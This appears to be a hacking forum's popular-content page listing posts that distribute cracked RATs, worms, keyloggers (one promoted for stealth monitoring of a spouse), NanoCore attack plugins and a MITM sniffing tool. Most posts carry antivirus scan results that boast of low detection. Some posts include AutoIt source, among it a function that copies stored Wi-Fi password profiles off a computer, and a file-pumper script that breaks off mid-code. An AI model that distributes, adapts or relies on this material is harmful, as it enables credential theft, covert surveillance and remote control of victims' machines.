Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Leaderboard


      Popular Content

      Showing content with the highest reputation on 12/03/2015 in all areas

      1. 1 point
        KeyBase v1.5 Cracked [video=youtube;4wXfyHy-4BM][Hidden Content] Server Scan : Filename: Server.exe Type: File Filesize: 61440 bytes Date: 21/04/2015 - 01:54 GMT+2 MD5: 44c87bdb34a79f0940b1d3541c95063b SHA1: c0236211e69edc85ec5b7fd0d36f9539702ae60a Status: Infected Result: 11/35 AVG Free - Trojan horse MSIL7.BLUD Avast - OK AntiVir (Avira) - TR/Dropper.Gen BitDefender - Gen:Variant.Kazy.592079 Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - Gen:Variant.Kazy.592079 G Data - Gen:Variant.Kazy.592079 IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - Trojan.MSIL/Injector.IYV Norman - Gen:Variant.Kazy.592079 Norton Antivirus - OK Panda Security - OK A-Squared - Gen:Variant.Kazy.592079 (B) Quick Heal Antivirus - OK Solo Antivirus - Trojan.Spy.Win32.Agent.Xrd Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - Gen:Variant.Kazy.592079 BullGuard - Gen:Variant.Strictor.83563 FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Download Link : [HIDE-THANKS][Hidden Content] Pass : KeyBase_LeVeL-23 Mirror: [Hidden Content] Pass: level23hacktools.com[/HIDE-THANKS]
      2. 1 point
        [Hidden Content] Pass: level-23.info Mirror: [Hidden Content] Pass: level-23.info
      3. 1 point
        | Private | Shadow w0rm 2.7 Stub Scan : Filename: Stub.exe Type: File Filesize: 58368 bytes Date: 03/08/2014 - 07:47 GMT+2 MD5: 6ebab6c7e710367e025bac83b161bc24 SHA1: 9737cb1c747115e21bcb942a59905b1a2d7faaea Status: Infected Result: 11/35 AVG Free - OK Avast - MSIL:KillAV-B [Trj] AntiVir (Avira) - TR/Dropper.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - W32/MSIL_Troj.AP.gen!Eldorado (generic, not disinfectable) F-Secure Internet Security - OK G Data - MSIL:KillAV-B [Trj] IKARUS Security - Backdoor.MSIL Kaspersky Antivirus - HEUR:Trojan.Win32.Generic McAfee - Artemis!6EBAB6C7E710 MS Security Essentials - Backdoor:MSIL/Bladabindi.G ESET NOD32 - Worm.MSIL/Bladabindi.D Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - Trojan.Win32.DownLoader11.dbipcq, Trojan.Win32.Agent.dbydyc, Trojan.Win32.DownLoader11.dcbvqr, Trojan.Win32.Autoruner.dcbxhd, Trojan.Win32.Zapchast.dccstp, Trojan.Win32.Autoruner.dchhvc, Trojan.Win32.Gen8.dciadz, Trojan.Win32.Zapchast.dciaqy, Trojan.Win32.Bladabindi.dcicag, Trojan.Win32.DownLoader10.dciesv Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - Suspicious:Trojan.FF250020400000000.mg VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Worm Scan : Filename: w0rm.exe Type: File Filesize: 57344 bytes Date: 03/08/2014 - 07:50 GMT+2 MD5: 10565b6c4f746198b3e0f697d1f57608 SHA1: 668363f8a89d046b4ecad6e26a06fded6a3d3ccd Status: Infected Result: 10/35 AVG Free - OK Avast - MSIL:KillAV-B [Trj] AntiVir (Avira) - TR/Dropper.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - Trojan.DownLoader11.15814 eTrust-Vet - OK F-PROT Antivirus - W32/MSIL_Troj.AP.gen!Eldorado (generic, not disinfectable) F-Secure Internet Security - OK G Data - OK IKARUS Security - Backdoor.MSIL Kaspersky Antivirus - HEUR:Trojan.Win32.Generic McAfee - OK MS Security Essentials - Backdoor:MSIL/Bladabindi.G ESET NOD32 - Worm.MSIL/Bladabindi.D Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - Malware.Generic.Dnt5 Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - Trojan.Win32.DownLoader11.dbipcq, Trojan.Win32.Agent.dbydyc, Trojan.Win32.DownLoader11.dcbvqr, Trojan.Win32.Autoruner.dcbxhd, Trojan.Win32.Zapchast.dccstp, Trojan.Win32.Autoruner.dchhvc, Trojan.Win32.Gen8.dciadz, Trojan.Win32.Zapchast.dciaqy, Trojan.Win32.Bladabindi.dcicag, Trojan.Win32.DownLoader10.dciesv Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Download Link : [HIDE-THANKS] [Hidden Content]]
      4. 1 point
        29.07.2015 - Intercepter-NG v0.9.10 Added: + Group Policy Hijacking + Forced Download and JS Inject + HSTS Spoofing + Traffic Changer + Smart Scan: NBNS + Bonjour resolve + hostnames cache. + Bruteforce mode: SMTP TLS, POP3 TLS, TELNET and Single Mode. + Auto ARP Poison Updated: SSL Strip improved. SSL MiTM rewritten: + Fast and stable + New certificates generation algorithm. + Cookier Killer + iOS Killer (iCloud, Instagram, VK) + Black and White lists A lot of fixes and improvements. URL : [HIDE-THANKS][Hidden Content]] This tool for sniffing https traffic ! az: [VERDE]File Is Clean[/VERDE] Checked By swag666
      5. 1 point
        Anonymous texts are sent without any number, the receiver does not see a number. gdgdg Link: [HIDE-THANKS][Hidden Content]]
      6. 1 point
        Advanced Keylogger v.3 Final Server Scan Date and Time: 7/19/2015 07:43:03 UTC\n File Name: Server.exe File Size: 81.84 KB MD5: fd3670dfd75d53a3eb74c0a15e4295dc SHA1: fd2d336bd2790588bbbf46db626f83e64991cb7d Detection: 17 of 35 (49%) Status: INFECTED AVG Free - Clean! Avast - MSIL:Agent-YW [Trj] AntiVir (Avira) - TR/Spy.Gen BitDefender - Gen:Heur.MSIL.Krypt.2 Clam Antivirus - Worm.Autorun-9829 COMODO Internet Security - Clean! Dr.Web - Trojan.DownLoader15.360 eTrust-Vet - Clean! F-PROT Antivirus - W32/MSIL_Troj.AP.gen!Eldorado (generic, not disinfectable) F-Secure Internet Security - Gen:Heur.MSIL.Krypt.2 G Data - Gen:Heur.MSIL.Krypt.2 IKARUS Security - Clean! Kaspersky Antivirus - HEUR:Trojan.Win32.Generic McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Worm.MSIL/Autorun.Spy.Agent.R Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Mal/MSIL-BA Trend Micro Internet Security - TSPY_VBMSIL.SMIA VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Gen:Heur.MSIL.Krypt.2 BullGuard - Gen:Variant.Kazy.423488 FortiClient - MSIL/KeyLogger.AWB!tr K7 Ultimate - Clean! NANO Antivirus - Trojan.Win32.Win32.dccnnq Panda CommandLine - Clean! SUPERAntiSpyware - Clean! Twister Antivirus - Clean! VIPRE - Trojan.Win32.Generic=21BT [Hidden Content] [HIDE-THANKS] [Hidden Content] [/HIDE-THANKS]
      7. 1 point
        xRAT v2.0.0.0 RELEASE4 [14.06.2015] Changed Target Framework to .NET Framework 3.5 Client Profile Added Startup Manager Added Keylogger Added Reverse SOCKS5/HTTPS Proxy Added option to show Tooltip on Clients with Information about their System Added No-Ip.org Support for dynamic IPs Improved Client & Server network code Added Buffer Manager Changed compression from LZ4 to QuickLZ Fixed reading of packets with length bigger than buffer size Changed buffer size to 1MB Improved Remote Desktop support for multiple monitors Improved Remote Shell Improved Settings Improved Builder Improved File Transfers Improved Updating of Clients Fixed threading issues Fixed memory leak in Server Many other bug fixes and small improvements ServerScan: [VERDE]Clean file[/VERDE] analyzed by caballo [HIDE-THANKS][Hidden Content] Source [Hidden Content] [/HIDE-THANKS]
      8. 1 point
        Descargar : [HIDE-THANKS][Hidden Content] [/HIDE-THANKS] [VERDE]Files are Clean[/VERDE] & Functional [Analyzed by you2004975] Un saludo Antuan26. MIRROR: [HIDE-THANKS][Hidden Content]]
      9. 1 point
        Hi all, here is new version of my RAT with major FIX: -fix bug when installing on Guest Account -fix bug when resizing borders on WIN8 -fix bug when uploading password plugin on remote -all now support WIN server 2008 under DEP -choose install folder & some PE options have been added to builder Download: [HIDE-THANKS][Hidden Content]] Pass: >level23hacktools.com
      10. 1 point
        DOWLOAND LİNK [Hidden Content] [Hidden Content]
      11. 1 point
        ClientScan: [/img] ServerScan: [VERDE]Files are Clean[/VERDE] & Functional [Analyzed by you2004975] [HIDE-THANKS][Hidden Content]]
      12. 1 point
        ServerScan [VERDE]Files are Clean[/VERDE] & Functional [Analyzed by you2004975] [HIDE-THANKS][Hidden Content]]
      13. 1 point
        Perfect Keylogger for Windows - easy to use stealth solution for PC and Internet surveillance. Discover the Truth now! new generation keylogger which is virtually undetectable. It was created as an alternative to very expensive commercial products like Spector Keylogger or E-Blaster. It has a similar functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and use it immediately without messing with settings. Perfect Keylogger is a popular award-winning tool, translated into 20+ languages. It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Some applications of the keylogger: Monitoring children's activity for parents Stealth monitoring of your spouse Restore lost information Monitor which programs were opened and when Recall what you wrote some time ago Files Clean analized by 0b3y [HIDE-THANKS][Hidden Content] >Pass : blazing4 [/HIDE-THANKS]
      14. 1 point
        Features: Fixed Some Error In port form Update File Manger Process Manger Remote Desktop Rigstrey Manger CMD Kelyogger Passwords Theif Chat With Victim Update Fun With Victim Run File " From Internet or Desk New in version 1.2: Fix the error in the CMD Fix the error when the restoration program File Manger property development Builder development property Add to hide property after operating Add Melt property Add property Send Msg Box Add the camera filming property Many many discovered for yourself and no Screenshots: Credits: ClientScan: ServerScan: [VERDE]Files are Clean[/VERDE] & Functional [Analyzed by you2004975] [HIDE-THANKS][Hidden Content]]
      15. 1 point
        [HIDE-THANKS] >#include $sLog = '' $hRun = Run(@ComSpec & " /C schtasks", "", @SW_HIDE, 2) While 1 $sLog &= StdoutRead($hRun) If @error Then ExitLoop Sleep(10) WEnd MsgBox(0, "", _Encoding_OEM2ANSI($sLog)) [/HIDE-THANKS]
      16. 1 point
        This function will steal the passwords of the wifis that are in the computer in a folder with the name of the computer, so you just have to take the file and put in your computer to take the wifi. [HIDE-THANKS] [LENGUAJE=autoit] ; #FUNCTION# ;=============================================================================== ; Name...........: wifipasstealer ; Description ...: Takes the wifi passwords of the computer. ; Syntax.........: wifipasstealer ($pathsave) ; Parameters ....: $pahtsave - The path where to save the wifi files, by default(1) the will be stored in the same directory where is executed, in a folder with the name of the computer. ; Return values .: Success - Returns 1 ; Failure - Returns 0 ; Use............: The file that it takes, just put them in the path:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\$foldername" where $foldername is the name of the folder that it will appear and it will automatically connects to the wifi. ; Author ........: 0b3y ;============================================================================================ #include Func wifipasstealer($pathsave=1) $path="C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\" $interfaces=_FileListToArray($path) $j=1 For $y=1 To $interfaces[0] Step +1 $i=1 $keypath=_FileListToArray($path&$interfaces[$j]) For $x=1 To $keypath[0] Step +1 If $pathsave=1 Then $dir=@ScriptDir&"\"&@computername DirCreate($dir) Else $dir=$pathsave DirCreate($pathsave) EndIf FileCopy($path&$interfaces[$j]&"\"&$keypath[$i],$dir&"\"&$keypath[$i]) $i+=1 Next $j+=1 Next If @error Then Return 0 EndIf Return 1 EndFunc [/LENGUAJE] [/HIDE-THANKS]
      17. 1 point
        Dark-wOrm v 0.3.6 [| INFO |] Name: Dark-wOrm Version: 0.3.6 Source rights before development: NjQ8 Coder: Dr-Dark Noir Some programming rights : NjQ8 & Blάĉк.Hάĉкєr & Security.Najaf & ʍᴙ.ώoŁƒ Programming language: VB.NET Platform programming: NET Framework 2 Stub Size: 28.0 KB Properties : Spread USB Spread in folders Spread in desktop shortcuts Spread in the WinRAR Anti kill Install strong Easily encrypt worm Install in StartUp And much more. . . Stub Scan : Filename: Stub.exe Type: File Filesize: 28672 bytes Date: 11/08/2014 - 00:07 GMT+2 MD5: dbe70bc52631c4df155a4a1a865cf25d SHA1: defa1d9a590b7ac7a797087c79ca9c94aec652bc Status: Infected Result: 6/35 AVG Free - OK Avast - OK AntiVir (Avira) - TROKTRAPS.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - HEUR:Trojan.Win32.Generic McAfee - OK MS Security Essentials - Backdoor:MSIL/Bladabindi.G ESET NOD32 - Worm.MSILOKutorun.Spy.Agent.R Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - Trojan.Win32.Bladabindi.dccnpq, Trojan.Win32.Agent.dccqhg, Trojan.Win32.DownLoader11.dbipcq, Trojan.Win32.Agent.dbydyc, Trojan.Win32.DownLoader11.dcbvqr, Trojan.Win32.Autoruner.dcbxhd, Trojan.Win32.Zapchast.dccstp, Trojan.Win32.Autoruner.dchhvc, Trojan.Win32.Gen8.dciadz, Trojan.Win32.Zapchast.dciaqy, ... Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - Suspicious:Trojan.FF250020400000000.mg VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Worm Exe Scan : Filename: 49916.exe Type: File Filesize: 27648 bytes Date: 11/08/2014 - 00:13 GMT+2 MD5: fff99ac0f94d8097895c0a3ef1cd14ab SHA1: 2c1606c652495c3c3ed66a6aacfa423ef51a016b Status: Infected Result: 6/35 AVG Free - OK Avast - OK AntiVir (Avira) - TROKTRAPS.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - Backdoor.MSIL Kaspersky Antivirus - HEUR:Trojan.Win32.Generic McAfee - OK MS Security Essentials - virus found deleted ESET NOD32 - Worm.MSILOKutorun.Spy.Agent.R Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - Trojan.Win32.Bladabindi.dccnpq, Trojan.Win32.Agent.dccqhg, Trojan.Win32.DownLoader11.dbipcq, Trojan.Win32.Agent.dbydyc, Trojan.Win32.DownLoader11.dcbvqr, Trojan.Win32.Autoruner.dcbxhd, Trojan.Win32.Zapchast.dccstp, Trojan.Win32.Autoruner.dchhvc, Trojan.Win32.Gen8.dciadz, Trojan.Win32.Zapchast.dciaqy, ... Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Download Link : [HIDE-THANKS] [Hidden Content]]
      18. 1 point
        [Plugins Pack] All NanoCore Plugins Released What is NanoCore? NanoCore is a Remote Admin Tool (RAT) used to remotely take control of either your own or a clients computer. Definition by owner : "NanoCore is the best remote administration tool you will ever use. That's a pretty bold statement to make right? Well spend a few minutes and read on so that I can convince you that it's true. Typically what most sellers would do at this point is try to convince you that their R.A.T is the fastest, most stable, most functional, etc. but how many of them are willing to back it up? NanoCore offers an unrestricted trial so that you may evaluate it for yourself before any purchase is made. Additionally, if you do decide to buy it and change your mind within 14 days of purchase then I will offer a *full refund, no questions asked. That alone should convince you to at least try it, there are no risks." --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- NanoBlack Author: Laser™ Features Screen locker with custom message and unlock password + startup option Cmd Prompt Window Spammer Website Spammer Hide Taskbar/Start Menu Stream custom sound to Client (.wav) NEW! ..and more to come! Scan To-Do Redesign screen lock screen (client side). It kinda looks terrible right now. - DONE (for now) Some top secret stuff that is...secret. [spoiler=Pic] [HIDE-THANKS][Hidden Content]] ------------------------------- Visible Mode [ Version 1.0.0.0 & Version 1.1.0.0 ] Author: Anonmoosekaab Installation Instructions To install Visible Mode, place the VisibleMode.ncp file in the plugins directory of your NanoCore installation (%NanoCore%\Plugins\). Launch NanoCore and choose the System Tab, then enable the Visible Mode plugin (should appear with a flashlight icon). Usage Using Visible Mode is very simple. Under the "Tools" right click icon, it will be located below "Request Elevation" and should have a flashlight as an icon and say "Toggle Visible Mode". Clicking this will cause the selected client(s) to show or hide the visibility form, depending on if it was previously visible. Version 1.0.0.0 Scan Version 1.1.0.0 Scan [spoiler=Pic] [HIDE-THANKS][Hidden Content]] ------------------------------ Swiss Army Knife Author: Anonmoosekaab Scan It currently contains: Force Kill Process (work in progress, 1 of three methods complete) Disable & Enable Webcam Lights 100% Crypter friendly and compatible Installation To install NanoCore Swiss Army Knife, drag the .ncp file into your NanoCore plugins directory (%NanoCore%\Plugins\). Launch NanoCore and click enable. Click the top green bar to restart NanoCore and apply plugin changes. You have now installed NanoCore Swiss Army Knife. Usage To use NanoCore Swiss Army Knife, simply right click as many clinets as you please and choose an option from the menu. [HIDE-THANKS][Hidden Content]] -------------------------------- Stackoverload Author: StackAttack About: What is Stackoverload Plugin? Stackoverload Plugin is the useful plugin for NanoCore that contains features for stealing data, trolling, destruction, and more! Current Features: Web: Browse page (Visible) Destructive: Command Prompt looper (Visible) Message Box Looper (Visible) CD Drive Open/Closer (Visible) Scan [HIDE-THANKS][Hidden Content]] --------------------------------- All-In-One Author: Rvaveo Feature list Monitor : Turn Monitor Off Turn Monitor On Rotate Screen by 90` Volume : Up (Full) Down (Zero) Mute [spoiler=Pic] [HIDE-THANKS][Hidden Content]] ------------------------------------- Remote Scripting Author: ๖ۣۜLazy™ What is RemoteScripting? RemoteScripting allows you to remotely execute custom scripts written from the Server. E.g. Batch files (.bat) and Visual Basic Script files (.vbs) Why use RemoteScripting? To my knowledge NanoCore does not have a remote scripting function! How does RemoteScripting work? RemoteScripting will create a temporary file with your code in it and execute it! Once executed and closed the client will clean up everything so no files are left behind. Updating! Currently working on a better IDE for the coding of the scripts (You can always use a 3rd party IDE and then just copy/paste) Also adding more features like .JS files. If you have any suggestions please comment below! Scan [spoiler=Pic] [HIDE-THANKS][Hidden Content]] ------------------------------- NanoProtect Author: ๖ۣۜLazy™ What is NanoProtect? NanoProtect is a plugin that guarantees safety to it's users, By installing NanoProtect you will be protected from and by other NanoCore users. This plugin relies on both users having the plugin (The server owner and the infected PC) Why use NanoProtect? If Every (or most) NanoCore users have NanoProtect installed then no NanoCore user will ever be able to infect one another, This means if you download an infected NanoCore client then once you execute it you will not show up on the server! Not only that but NanoProtect will alert you of where in infected file is! How does NanoProtect work? Simple really, Once the client is executed it will check if NanoCore is installed on your PC. If it is then the client process will be killed and you won't be infected. What are the cons of NanoProtect? Strictly speaking, NanoProtect has very little cons. 1 con people that the builder on the infected file needs to also have NanoProtect installed? Is this bad? Not at all! Here is the reason; If you want protected from NanoCore users then you must also provide protecting. A win/win situation in my books! Scan [spoiler=Video] [HIDE-THANKS][Hidden Content]]
      19. 1 point
        [spoiler=Scan:]File Name: Sp00fer.exe File Size: 424.5 KB Scan Date: 2014-07-27 Scan Result: 4/34 MD5: 9bcf054dc8d249e2f21abf5269b28a77 Verified By NoDistribute: Virus Scan Result AVG Free: Clean Avast:Win32:Evo-gen [susp] AntiVir (Avira): Clean BitDefender: Clean Clam Antivirus:PUA.Win32.Packer.Upx-48 COMODO Internet Security: Clean Dr.Web: Clean eTrust-Vet: Clean F-PROT Antivirus: Clean F-Secure Internet Security: Clean G Data: Clean IKARUS Security: Clean Kaspersky Antivirus: Clean McAfee: Clean MS Security Essentials: Clean Norman: Clean Norton Antivirus: Clean Panda Security: Clean A-Squared: Clean Quick Heal Antivirus: Clean Solo Antivirus: Clean Sophos: Clean Trend Micro Internet Security: Clean VBA32 Antivirus: Clean Zoner AntiVirus:INFECTED [Trojan.Autoit.NPP] Ad-Aware: Clean BullGuard:Download:Gen:Variant.Graftor.146108 FortiClient: Clean K7 Ultimate: Clean NANO Antivirus: Clean Panda CommandLine: Clean SUPERAntiSpyware: Clean Twister Antivirus: Clean VIPRE: Clean [HIDE-THANKS]Download: Sp00fer.exe Src. code: level-23.cc[/HIDE-THANKS] _L23
      20. 1 point
        File ++++ [Pumper] by X-ShaDoW V [sRC] [HIDE-THANKS]#include #include #include #include #include #include #include #include $Main = GUICreate("File ++++ by X-ShaDoW V", 379, 260, -1, -1) $Prog = GUICtrlCreateProgress(-2, 240, 385, 25) $Path = GUICtrlCreateInput("", 32, 8, 297, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_READONLY)) GUICtrlSetTip(-1, "Path to file which you want to ++++ ") $Label1 = GUICtrlCreateLabel("File:", 8, 10, 23, 17) $SelectPath = GUICtrlCreateButton("...", 328, 8, 43, 21) GUICtrlSetTip(-1, "Select file path") $Byte = GUICtrlCreateSlider(8, 72, 366, 29, BitOR($GUI_SS_DEFAULT_SLIDER,$TBS_BOTH,$TBS_NOTICKS)) GUICtrlSetData(-1,2) GUICtrlSetLimit(-1, 4, 0) $Label2 = GUICtrlCreateLabel("Byte", 12, 104, 25, 17) GUICtrlSetTip(-1, "Byte") $Label3 = GUICtrlCreateLabel("KB", 100, 104, 18, 17) GUICtrlSetTip(-1, "Kilobyte") $Label4 = GUICtrlCreateLabel("MB", 185, 104, 20, 17) GUICtrlSetTip(-1, "Megabyte") $Pump = GUICtrlCreateButton("++++", 160, 184, 67, 33) $Amount = GUICtrlCreateInput("10", 152, 152, 81, 21) $UD = GUICtrlCreateUpdown($Amount) GUICtrlSetLimit(-1, 32767, 0) GUICtrlSetTip(-1, "Amount to pump") GUISetState(@SW_SHOW) Func _CompExplorerCurrentAdress() Return (ControlGetText) EndFunc ;================================================================================?========================= ;Dev-point ;===============================================================================?====================================== Func _ProgressSetMarquee($iControl, $hHandle) Local $bType = 0, $iColor = -1, $iIndex = -1 If Not IsDeclared("Global_ProgressSetMarquee") Then Global $Global_ProgressSetMarquee[1][3] = [[0, 3]] For $A = 1 To $Global_ProgressSetMarquee[0][0] If @error Then ExitLoop If $Global_ProgressSetMarquee[$A][0] = $iControl Then $iIndex = $A $bType = $Global_ProgressSetMarquee[$iIndex][1] ExitLoop EndIf Next If $iIndex = -1 Then If $Global_ProgressSetMarquee[0][0] <= UBound($Global_ProgressSetMarquee, 1) + 1 Then ReDim $Global_ProgressSetMarquee[($Global_ProgressSetMarquee[0][0] + 1) * 2][$Global_ProgressSetMarquee[0][1]] $Global_ProgressSetMarquee[0][0] += 1 $iIndex = $Global_ProgressSetMarquee[0][0] $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = $bType $Global_ProgressSetMarquee[$iIndex][2] = $iColor EndIf Local $hControl = GUICtrlGetHandle($Global_ProgressSetMarquee[$iIndex][0]), $aControlGetPos = ControlGetPos($hHandle, "", $Global_ProgressSetMarquee[$iIndex][0]) Local $aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hControl, "Int", 0xFFFFFFF0) Local $aExStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hControl, "Int", 0xFFFFFFEC) If $aStyle[0] <> 1342308360 Then GUICtrlDelete($Global_ProgressSetMarquee[$iIndex][0]) $iControl = GUICtrlCreateProgress($aControlGetPos[0], $aControlGetPos[1], $aControlGetPos[2], $aControlGetPos[3], 0x0008, $aExStyle[0]) ; 0x0008 $hControl = GUICtrlGetHandle($iControl) If $Global_ProgressSetMarquee[$iIndex][2] <> -1 Then DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", $hControl, "wstr", 0, "wstr", 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) EndIf $Global_ProgressSetMarquee[$iIndex][0] = $iControl EndIf Switch $Global_ProgressSetMarquee[$iIndex][1] Case 1 $bType = False Case Else $bType = True EndSwitch DllCall("user32.dll", "lresult", "SendMessageW", "hwnd", $hControl, "uInt", 1034, "wparam", $bType, "lparam", 50) If @error Then $Global_ProgressSetMarquee[$iIndex][1] = 1 If $Global_ProgressSetMarquee[$iIndex][1] = 1 Then GUICtrlDelete($Global_ProgressSetMarquee[$iIndex][0]) $iControl = GUICtrlCreateProgress($aControlGetPos[0], $aControlGetPos[1], $aControlGetPos[2], $aControlGetPos[3], 0x0008, $aExStyle[0]) ; 0x0008 If $Global_ProgressSetMarquee[$iIndex][2] <> -1 Then DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($iControl), "wstr", 0, "wstr", 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) EndIf $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = 0 Return 0 EndIf $Global_ProgressSetMarquee[$iIndex][1] = 1 Return 1 EndFunc ;==>_ProgressSetMarquee ; #FUNCTION# ================================================================================?========================= ; Dev-point ;===============================================================================?====================================== Func _ProgressSetTheme($iControl = -1, $bThemeColor = 0x24D245) Local $bType = 0, $iColor = $bThemeColor, $iIndex = -1, $hControl = GUICtrlGetHandle($iControl) If Not IsDeclared("Global_ProgressSetMarquee") Then Global $Global_ProgressSetMarquee[1][3] = [[0, 3]] $iControl = DllCall("user32.dll", "Int", "GetDlgCtrlID", "hwnd", $hControl) If @error Then Return SetError(1, 1, 0) $iControl = $iControl[0] For $A = 1 To $Global_ProgressSetMarquee[0][0] If @error Then ExitLoop If $Global_ProgressSetMarquee[$A][0] = $iControl Then If $Global_ProgressSetMarquee[$A][1] = 1 Then Return SetError(1, 1, 0) ; Marquee is already running. $iIndex = $A $bType = $Global_ProgressSetMarquee[$iIndex][1] ExitLoop EndIf Next If $iIndex = -1 Then If $Global_ProgressSetMarquee[0][0] <= UBound($Global_ProgressSetMarquee, 1) + 1 Then ReDim $Global_ProgressSetMarquee[($Global_ProgressSetMarquee[0][0] + 1) * 2][$Global_ProgressSetMarquee[0][1]] $Global_ProgressSetMarquee[0][0] += 1 $iIndex = $Global_ProgressSetMarquee[0][0] $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = $bType $Global_ProgressSetMarquee[$iIndex][2] = $iColor EndIf Local $aReturn = DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", $hControl, "wstr", 0, "wstr", 0) If @error Then Return SetError(1, 1, 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) Return $aReturn[0] EndFunc ;==>_ProgressSetTheme Func _ProgressMarquee_Start($iControlID = -1) Local Const $PBM_SETMARQUEE = 1034 Return GUICtrlSendMsg($iControlID, $PBM_SETMARQUEE, 1, 50) EndFunc ;==>_ProgressMarquee_Start Func _ProgressMarquee_Stop($iControlID = -1, $iReset = 0) Local Const $PBS_MARQUEE = 0x0008, $PBM_SETMARQUEE = 1034 GUICtrlSendMsg($iControlID, $PBM_SETMARQUEE, 0, 50) If $iReset = 1 Then Return GUICtrlSetStyle($iControlID, $PBS_MARQUEE) EndIf Return 1 EndFunc ;==>_ProgressMarquee_Stop While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $SelectPath $fd = FileOpenDialog("Select File Path",_CompExplorerCurrentAdress(),"Executable Files (*.exe;*.bat)|Music Files (*.mp3;*.wav)|All Files (*.*)",1+2) If Not @error Then GUICtrlSetData($Path,$fd) EndIf Case $Pump If FileExists(GUICtrlRead($Path)) Then Local $ByteInt,$ByteStr If GUICtrlRead($Byte) = 0 Then $ByteStr = "Byte" $ByteInt = Int(GUICtrlRead($amount)) * 8 ElseIf GUICtrlRead($Byte) = 1 Then $ByteStr = "Kilobyte" $ByteInt = Int(GUICtrlRead($amount)) * 1024 ElseIf GUICtrlRead($Byte) = 2 Then $ByteStr = "Megabyte" $ByteInt = Int(GUICtrlRead($amount)) * 1048576 EndIf If 